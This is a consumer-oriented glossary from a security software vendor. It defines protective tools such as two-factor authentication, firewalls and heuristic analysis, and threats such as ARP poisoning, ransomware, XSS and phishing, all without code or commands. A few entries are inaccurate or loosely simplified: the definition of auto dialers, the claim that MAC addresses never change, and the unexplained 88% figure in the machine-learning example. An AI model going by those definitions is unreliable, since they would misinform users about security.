outline 1

Security 101

   Security Tools

 

2-Factor Authentication:  

 

Two unique requirements to access a document, application, or more.  

Example – A password AND a text message code.  

 

The password is something you know and the text message is on something you have, YOUR phone. Keep in mind that just using a password and a security question, like high school mascot, is NOT 2-Factor Authentication because they are both something you know. It needs to be a variety of something you know, have, something you are (think fingerprint or retina), and somewhere you are.  

 

Passwords alone can be compromised, but 2-Factor Authentication is a great way to stay secure.

 

2-Step Verification:  

 

Similar to 2-Factor Authentication, this is a method of requiring an additional layer of access on top of a password. The difference is that 2-Step verification could be a second knowledge-based question (example – What street you grew up on). While better than relying on a password alone, it’s often best to go with 2-Factor for the best security.  

 

Anti-Theft: 

 

Think of Anti-Theft as a way to protect or retrieve devices after they’ve already been stolen. Some solutions may have loud alarms that prevent your phone or laptop from being taken, but most often these tools lock your photos, documents, and applications so they stay private.  

 

Some versions of Anti-Theft provide a find-my-device feature with a map and address or even use the camera as a way to spy on the new owner. Keep an eye out for software that allows for device wipe as a last measure to maintain privacy.  

 

Anti-Tracker: 

 

Often found in different anti-virus programs, this is a great way to stay private online and even cut down on advertising clutter. Anti-Trackers can work in a few different ways, but most often prevent websites from monitoring browsing cookies. This means not only is your history and activity not being spied on (Hooray 4 Privacy), but you should see a reduction in those tailored webpage ads. Less ads often means faster loading too! 

 

Artificial Intelligence: 

 

This is one of the broader terms in security, but still highly important and constantly evolving. AI isn’t a single tool or product. It’s really more of a method where an application can learn, adapt, and act. This is often seen in machine learning or behavioral analysis, but there are many different tools that fall under AI. Here is an example of how AI keeps you safe.

  

Artificial Intelligence in an Antivirus solution looks at an email file and determines that when opened it will access sensitive documents and erase them. Even though the code in the file has never been seen before, the AI knows this action is malicious and determines it should block it, notify you, and then submit the code to the cloud for further analysis.  

 

Behavioral / Anomaly Detection:   

 

A lot like the name implies, this Antivirus / Intrusion Prevention method looks at behavior characteristics to determine if something is malicious or not. By evaluating what a file, exploit, or application wants to do, even never before seen threats can be stopped preemptively. Here’s an example. 

 

You click on a new application to download. The code has never been seen or evaluated, but through behavioral analysis your Antivirus determines it wants to change administrative settings on your computer. Clearly, this is an unusual behavioral that deviates from the normal activity of an application and must be blocked. ‘Behavioral’ and ‘Anomaly’ are used interchangeably by some vendors and described as slightly different by others. Both evaluate behaviors, but may differ in what stage of the attack a threat is blocked.  

 

BitLocker: 

 

This tool comes standard with Windows PC’s and is used to secure files, passwords, and more through device encryption. When you enter a user password your data becomes unencrypted and clear to read. When you logoff the data is encrypted again.  

 

Cloud Management:  

 

Think of cloud management as a way to access security applications like antivirus from anywhere. Just as you would log into your bank account or social media from a browser, you can do the same to make sure your devices are protected through a number of different security features. Different solutions provide helpful features like device tracking, parental controls, or online tech support. All of this is made much simpler through cloud management.  

 

Cloud Scanning: 

 

Cloud scanning can mean different things to each security vendor. For antivirus solutions there are typically two common ways it is referenced. One way, is that the actual scanning function takes place in the cloud and not on your device. This means the scan uses far less memory and CPU so you can work without being slowed down too much.  

 

The second way is more about security. When an antivirus solution is connected to the cloud it is able to constantly receive updates on new threats, important patches, and can even submit files from your device for analysis.  

 

Cross-Platform Protection: 

 

Protecting the Windows PC or MAC you’re using can sometimes only be half the battle. Even if your device is safeguarded from specific threats for that operating system (like MAC or iOS), you likely still communicate with different ones (Android, PC, Linux). Cross-Platform Protection prevents transferring a threat from one operating system to another whether it be over email, file-share, or more.   

 

Data Loss Prevention: 

 

The idea is simple, keep sensitive data from being taken off of your device maliciously or by accident. DLP solutions can work in a variety of ways, but most commonly they succeed by scanning for certain words, phrases, or files. Whether a threat actor is attempting to steal your financial records or an in-house worker is downloading product information for personal gain, Data Loss Prevention solutions watch a variety of channels (email, USB, network connections) and immediately flag connections. Where some versions just prevent the data from being taken, others provide a watermark over documents to discourage screenshots. 

 

Device Control:  

 

There are two reasons you are most likely to use device control. The first, referred to as ‘writing’, is to keep sensitive data from leaving your device. This can be as simple as blocking all downloads to removeable media like USBs (think Data Loss Prevention) or even setting encryption rules for your hard drive, in case it is stolen. The second, ‘reading’, is to prevent malicious threats from harming your device.

This most commonly applies to blocking USB connections (thumb drives, smartphones, and more) from downloading malware directly onto your device. Device Control applications typically provide very simple rules that state when a device can / cannot interact with your machine. 

 

Disk Encryption: 

 

Also referred to as Full Disk Encryption, this is the process of converting your hard drive disk into scrambled code that can only be read by entering a password. Disk Encryption tools come standard with newer versions of Windows PCs (BitLocker) and Macs (FileVault). Different Antivirus solutions may provide a disk encryption feature that helps you manage these tools. The benefits are often to show you are in compliance with certain data regulations and the ability to manage encryption of several devices from a single location. 

 

File Encryption:  

 

This can apply to a file that is at rest (sitting in your hard drive unused) or in-transit (being sent in an email). File Encryption scrambles information into unreadable code until it is unlocked with a key. The most common and accepted form of encryption is AES. You may see different numbers like 128-bit or 256-bit following AES. These are different key sizes. The larger the number, the larger the key, and the stronger the encryption.  

 

Firewall: 

 

One of the more universally used terms in security, firewalls are a staple of protecting both devices and networks. One misconception about firewalls is that they are these broad all-in-one tools that block, hunt, and eradicate any and all threats. Well, that is partly true as Firewalls do act as a gate and block both incoming and outgoing traffic. This is either done by rules (no connections from this IP, allow traffic only to this online application, stop access to social media sites) also called a Stateless firewall.  

 

The other approach, Stateful, takes context into consideration. Maybe, you allow connections from your device to unknown IP addresses, but your firewall notices an unordinary amount of traffic from different computers all over the world (a potential botnet attack) and immediately cuts off the network. Both approaches are very common and work to keep sensitive information in and malicious network activity out. The takeaway however, is that once something gets past the firewall it’s up to antivirus and intrusion detection / prevention to stop it (Unless your firewall has these additional features built in).  

 

Heuristic Analysis: 

 

This can often be used interchangeably by different Antivirus Solutions. Like Behavior Analysis, Heuristic Analysis evaluates the actions a file or download wants to take. The difference is that Behavior Analysis often looks at the actual execution or action taking place. Heuristic Analysis, on the other hand, looks at the way the code is constructed and compares it previously seen malware (kind of like machine-learning, covered below). It also evaluates instructions within the code and essentially determines if they present a risk to your device. The important part is that whether or not a file has been seen before, Heuristic Analysis can determine what it wants to accomplish by the way it is designed. 

 

Host Intrusion Prevention: 

 

Like Antivirus, Host Intrusion Preventions look for malicious activities and attempt to block and eradicate them. Some slight differences are that HIPS may search a larger area; network logs, running processes, memory, and the computer’s core (known as the kernel). Depending on the solution, HIPS may also have additional remediation tools beyond just block and quarantine. Today, these features can also be found in some newer, Next-Gen, Antivirus solutions even if the term Host Intrusion Prevention is not explicitly mentioned.  

 

Link Scanning:  

 

A tool to verify if a link leads to a safe or malicious URL. Some Antivirus solutions allow you to simply hover over a link and see if the destination is trustworthy. 

 

Log Files:  

 

An overview of activity on your device. Different log files can show network activity, applications in use, or processes occurring. Think of these as historical records or evidence of what’s occurred on your device.

 

Machine Learning: 

 

An algorithm for determining the outcome of a file, application, or more. Machine Learning is most commonly used by building a pattern of events, signatures, malware, trusted files, and more. When an Antivirus solution evaluates something with Machine Learning it essentially cross references it to the algorithm and determines the most likely scenario.  

 

Here’s an oversimplified example. An antivirus company builds up analytics over three years. They see that 75% of files with the signature (code string) ‘525402C2B…’ will attempt to change administrative settings on a computer (not good). The same company also sees that 75% of files that attempt to load Java will try to create a backdoor on the device (also not good). So, when a file is downloaded and Antivirus sees it has the signature 525402C2B AND ALSO wants to load Java, Machine Learning says it has nearly an 88% probability of being malicious and blocks it.  

 

You may see Antivirus companies discussing how many billions of events they track daily in the cloud. The reason this is important is because this is often the information that is put into their machine learning algorithms. The more information at hand, the stronger the algorithm.  

 

Memory Scanner: 

 

Some viruses do not reside in a hard drive, but live only in short term memory (RAM). Often, when a computer conducts a virus scan it looks at files and determines if they are malicious. If a virus uses a running computing process and does not install fully onto your device it is much harder to detect. Memory scanners (often with the help of Behavioral Analysis) are able to catch what are called fileless attacks as they execute.

 

On Demand Scanning: 

 

The ability to scan a device at any time. Most Antivirus solutions offer quick scans that search common files and local disks. System scans are more in depth and search things like boot sectors and system registries (where more complex viruses may hide). They take more time and resource power, but can be much more effective.  

 

Patch Update: 

 

The process of fixing vulnerabilities and updating software. It’s important to stay up to date on patches as most often they are released to stop potential security threats known as exploits.  

 

Port Scanning:  

 

When done through Antivirus or a network tool, this is an easy way to see open connections on your device. Port Scanning helps not only show your network traffic, but what applications are being used and what data is being sent / received. You may hear Port Scanning in a negative way as threat actors also attempt this process to spy on networks. The best defense here is a good offense and understanding your own network’s vulnerabilities before they do. 

 

Quarantine: 

 

A safe location to house malware and different viruses before they are released or permanently deleted. Most Antivirus solutions will quarantine a file that appears malicious by removing it from its current location on your device so no further harm can be done. Some solutions may send additional information to the cloud for further analysis before taking next steps.  

 

Real-Time Protection:  

 

Blocking malicious threats, the moment they are detected. Think of Real-Time protection like an automated Antivirus scan that is always working. If a file, email, application, or more is started, Real-Time protection will evaluate it and alert you of any potential threats. On-demand scanning is still a good resource to consistently review files or drives, but Real-Time protection is an extremely helpful first line of defense that works on your behalf.  

 

Remote Device Wipe:  

 

If your device is lost or stolen and you want to ensure sensitive information cannot be seen, Remote Device Wipe will allow you to erase the entire drive. This feature is most often accessible from a cloud management console on a different desktop or mobile device. (It’s helpful to have your device’s data backed up to the cloud beforehand).   

 

Removeable Media Scanning: 

 

On-demand or real-time scanning of CDs, DVDs, USBs, or even mobile devices. (Fun fact, most people plug in USB’s found on the ground out of sheer curiosity. We’d strongly recommend not doing this.)  

 

Sandbox: 

 

A safe and protected environment to test files, malware samples, and applications. Sandboxes work by letting a program run as intended to see what it wants to accomplish and how threatening it is.  

 

Security Policies:  

 

While this can be a vague term, when referenced with Antivirus solutions it often means having different rules for content, applications, and more based on a specific device or user. 

 

Signature Analysis: 

 

Comparing files to a repository of known threats (think of this like looking up a mugshot). When a sequence of bytes (known as a signature) matches a previously seen piece of malware, Signature Analysis knows to block the download or action. This is one of the most common forms of virus protection, but it’s important to pair it with Machine Learning, Heuristic Analysis, or Behavior Analysis to prevent unknown (zero-day) threats.  

 

Threat Feed: 

 

A constantly growing collection of security events. Security applications like Antivirus and Anti-Malware use threat feeds from the cloud to provide devices with new updates on malicious behaviors, signatures, machine learning data, and more. A threat feed is often gathered from millions of devices and can include everything from strange behaviors, IP addresses, or information about potential targets.

 

Here’s an oversimplified example of a threat feed. A computer in California is attacked by an unknown threat. The signature of that threat is fed to the cloud. A device in Florida connected to that cloud receives an update to now block that signature.  

 

UEFI Scanner:  

 

A scan of a device’s firmware and underlying operating system. This particular scan is helpful to find and eradicate rootkits (viruses that make system changes upon bootup).  

 

URL / Web Filtering:  

 

Preventing access to certain websites through rules you set up. These can be specific to a single domain name or often by general content categories (Adult, gambling, social media, etc.). Certain security tools will work on your behalf to block malicious URLs if they are deemed fraudulent or untrustworthy. 

 

VPN (Virtual Private Network):  

 

A Virtual Private Network is a way to connect a remote device to a network and secure all communication. Think of it like this. When two laptops are on the same Wi-Fi they can communicate securely because the traffic does not have to travel over the public internet. A VPN is a way to recreate that connection through an encrypted tunnel. This is a helpful and secure way to communicate with business devices or simply logging into a bank account. 

 

Web Certificate Checker:  

 

Take a look at the lock symbol next to Outlinesoftware.com. This symbol certifies that a website domain is registered with a Certificate Authority and its identity is trustworthy. More importantly, it certifies that a site is using encryption to protect information you send / receive. A website that does not have a valid certificate may not provide a secure connection.  

 

       Threats

 

Advanced Persistent Threats:  

 

A complex threat that remains hidden for an increased amount of time (possibly months) and attempts to steal data without being seen. Advanced Persistent Threats are often created by highly financed groups like nation states and cyber criminals. The main goal is typically not to set off alarms by causing harm, but rather to continue accessing more data by gaining additional device credentials or moving from one device to another. APT’s work in several stages, but a common element is reconnaissance of your device through phishing and social engineering.

 

Adware:  

 

Advertisements that come as a pre-installed application on a device or popup during browsing. Adware can often be pulled from your cookies and online activity. These can either be in the form of annoying popups or sometimes malicious links with hidden downloads. 

 

ARP Poisoning:  

 

Assigned to every device is a unique 12-digit MAC address. Think of this like a social security number for computers and mobile devices that never changes. MAC addresses are stored in an ARP table on your router and communicate where to send information. When you access an IP address you are really reaching out to a specific MAC address and a router uses the ARP table to help navigate.  

 

ARP Poisoning attacks work by tricking the ARP table into thinking an IP address goes to a different MAC address than intended. Example – You attempt to send a sensitive email. The email has to go through your router to reach the internet, but because of ARP poisoning the MAC address you think goes to your router actually belongs to an attacker on your network. The attacker receives the email instead of your router. 

 

Auto Dialers:  

 

Hidden telephone connections designed to spy on you through your device’s microphone. (Not to be confused with trusted auto-dialer software used by sale’s organizations).    

 

Botnet:  

 

A collection of computers used, often unknowingly, to connect to a single network or device with the purpose of disrupting its services and resources. There are two ways a Botnet can affect you. If you are on the receiving end of an attack, many bots will ping your device or router until all available bandwidth is used up. This will make it impossible to use any internet services until the attack is over (Think, Denial of Service). The other way is if your device is used as a bot (also called a zombie) to attack another device. This will also eat up your computers resources as it will be rapidly sending pings as long as the attacker has control. 

 

Brute Force:  

 

A Brute Force attack is an attempt to guess a password by trying every possible combination. Given enough time and attempts a Brute Force attack will eventually succeed. The best way to thwart Brute Force attempts is by setting lockout times for incorrect password attempts.   

 

Business Email Compromise:  

 

An attempt to steal information or cause harm through email. Business Email Compromises often take the form of phishing or spoofed emails and attempt to gather information from the recipient or trick them into downloading malware. The best way to thwart BECs is to be vigilant when reviewing emails and use good judgement on what information you share or links you open. 

 

CryptoLocker / Ransomware:  

 

Malware that encrypts files, drives, and more on your device with a key known only to the attacker. To retrieve the key, you are often required to pay a ‘ransom’ in crypto currency or risk losing all of your data. Some forms of Ransomware may also threaten to publish sensitive data publicly.  

 

Ransomware has become one of the most prominent and common types of attacks. It can best be thwarted by creating safe copies of data and using software that detects Ransomware behavior.  

 

Denial of Service:  

 

An attack on your computer’s resources making it unable to provide certain network or application services. Example – If an attacker can send an excessive amount of traffic to your router or device it can use up all potential bandwidth and keep you from accessing the internet.  

 

One common yet highly dangerous version is through a Distributed Denial of Service. (This simply means many devices are targeting you at once. Think, botnet). A successful Distributed Denial of Service attack can shut down an organization’s online operation for an extended period of time. This can be done to cause harm to government operations, help a business competitor thrive, or even to demand a ransom before the attack will subside. (Ransom Distributed Denial of Service) 

 

DNS Attacks:   

 

First, a very…very quick overview of DNS. When you go to Outlinesoftware.com you are actually visiting the IP address – 35.193.76.27 – That can be difficult to remember so DNS allows you to enter the domain name instead and sends you to the right IP.  

 

There are several ways a DNS server or DNS services may be attacked. Two of the more common methods are in the form of Denial of Services and DNS spoofing. DNS Denial of Services happen when an organization’s internet facing DNS servers are queried rapidly. (These attacks can be quite complex and include a lot of components). 

 

The second common attack, DNS spoofing, is when an attacker is able to coax you into visiting a different IP address than intended. Example, you enter the domain name you wish to enter and are instead sent to the attacker’s malicious website.  

 

Keep in mind, unlike most cases of computer viruses, malware, and trojans – DNS attacks are not simple files to block / prevent. These are complex threats that nearly always involve a hands-on attacker looking to exploit servers and network vulnerabilities. 

 

Exploits:  

 

A tool that takes advantage of a vulnerability in a device or application. 

 

Fileless Attack: 

 

A malicious program, file, or malware that lives only in short-term memory and does not download onto a device’s hard drive. This attack is able to evade traditional anti-virus scans that search through common files and drives. Fileless attacks are best prevented through behavioral analysis and exploit blocking.  

 

Keyloggers: 

 

Tools or programs that spy on your keystrokes to steal passwords, financial information, and more.  

 

Homoglyph Attacks:  

 

Using a similar looking letter, number, or symbol to spoof a user through phishing emails or fraudulent domains.   

An email sent from 0utlinesoftware.com (That’s a zero, fyi) pretending to be from Outlinesoftware.com  

 

Insecure Sites: 

 

A site deemed either fraudulent or untrustworthy (not using proper encryption to protect data).    

 

Lateral Movement:  

 

When an attacker moves from one device or application to another in attempt to access more information.  

 

Malware: 

 

A form of software that wants to harm a device or data.  

 

Modern Threats:  

 

A catch-all term for threats that are more complex and able to evade older anti-virus scans. Modern Threats can often refer to Ransomware, Advanced Persistent Threats, Polymorphic Malware (The malware continuously alters itself to stay hidden), or targeted spear-phishing attempts.  

 

Packers:  

 

A tool to compress software like malware or executables into a hard to detect package. There are many forms of packers that function differently and may encrypt malware or change the way its constructed rather than just use compression. In each case the goal is still the same, to keep the malicious program hidden. A great way to stop packers is to utilize real-time protection that blocks executions, no matter what the file or program looks like. 

 

Pharming:  

 

Quite similar to a DNS spoofing attack, pharming occurs when an attacker leads you to a website designed to look trustworthy. Example, you go to a webpage that looks exactly like your bank. You enter your username and password into the fake sites login and now the attacker has access to your financial information. 

 

Phishing: 

 

Attempts to scam a user through fraudulent websites, emails, text messages, phone calls and more. Phishing attempts can be large scale (think, daily robo-calls) or highly targeted. Personalized phishing attempts are called Spear-Phishing. When this occurs with a high-level executive, say for instance a CEO or politician, you may also hear the term ‘Whaling’.  

 

Spear-Phishing attacks are consistently among the most dangerous cyber threats as attackers are very good at making emails look legitimate. By using social media, business websites, and referencing colleagues, attackers are able to send messages that look both safe and urgent.  

Check the Outline Trending Page to learn more about the dangers of Phishing. 

 

Rootkits:  

 

A malicious software that gains root-level access on a device so that it can remove traces of its existence and make administrative level changes. Rootkits can be delivered through malware and exploits or even Advanced Persistent Threats where an attacker is looking to gain complete control and access of a device. There is not sure-fire way to prevent Rootkits, but Behavioral Analysis, Exploit Prevention, and continuous patching will help.  

 

Spyware: 

 

There are versions of spyware that are less malicious, like Adware, that attempt to track your online activity for the purpose of sending you tailored ads. Then, there are much more dangerous applications like keyloggers and rootkits that track activity for the purpose of stealing sensitive data and login information. Newer forms of spyware may also attempt to access a device’s webcam and microphone to listen in on conversations.  

 

Trojan:  

 

A malicious file or application that is designed to look trustworthy. Example – Ever visit a webpage and see a popup that says “Antivirus Expired, click here”? These can often be fairly easy to spot, but Trojans can also disguise themselves in more sophisticated ways. Phishing emails are a great way for attackers to send Trojans that may look like trusted word documents, but are carrying malware. Luckily, a Trojan will not work on its own and needs a user to allow for download. The best way to prevent this from happening is to stay vigilant (NOT CURIOUS) when allowing downloads. 

 

Vulnerable / Insecure Wi-Fi: 

 

A vulnerable or insecure Wi-Fi may not necessarily be malicious. In fact, most vulnerable wi-fi networks occur at local coffee shops. Public wi-fi can be a great thing, but the problem is weak passwords (or ones written on the wall) mean anyone can access the network. If the wi-fi is using an insecure encryption method (often the case) the data you send can be seen quite easily. When using public wi-fi it’s good practice NOT to access any sensitive data, like financial sites, without using a VPN.  

 

Another thing to consider is that you may not always be accessing the intended wi-fi. It’s not difficult for someone to sit down in a coffee shop, create their own wi-fi network, and give it the very same name as the public one. This means you may be unintentionally connecting to an attacker’s own personal network. Different versions of Antivirus and Internet Security have features to identify untrusted wi-fi networks.  

 

Worms:  

 

A virus that works by spreading across computers and continuously copying itself. Worms do not need to be attached to a program (Different from Trojans) and can often be sent through mass emails and vulnerabilities.  

 

XSS (Cross-Site Scripting):  

 

A malicious code injection into a trusted website that can be transferred to users through different input fields (like the login portal) or applications (Java). XSS attacks work when an attacker is able to exploit a vulnerability in a website that accepts a malicious script to be stored. Later, when a user visits the site and attempts to access a specific feature, the malicious script is downloaded and the user’s device believes it is safe as it comes from the trusted website.  

 

Zero-Day Threats:  

 

Threats that are brand new in the wild and have not been added to any security databases. Zero-Day threats may be an exploit of a recent software vulnerability or a new form of malware. These are best prevented through security tools that do not rely solely on signature analysis (as the signature is entirely new or non-existent) and utilize some form of behavior analysis, heuristic analysis, or machine learning.

 

*Please note, each manufacturer may use slightly different language or examples for the above terms. Where one application may use Behavior Analysis to monitor events in motion, another may use it to evaluate code pre-execution. The goal of the above definitions is to provide a general understanding of common security features and threats. It is always a good idea to check out each companies’ product documentation.*

Scroll to Top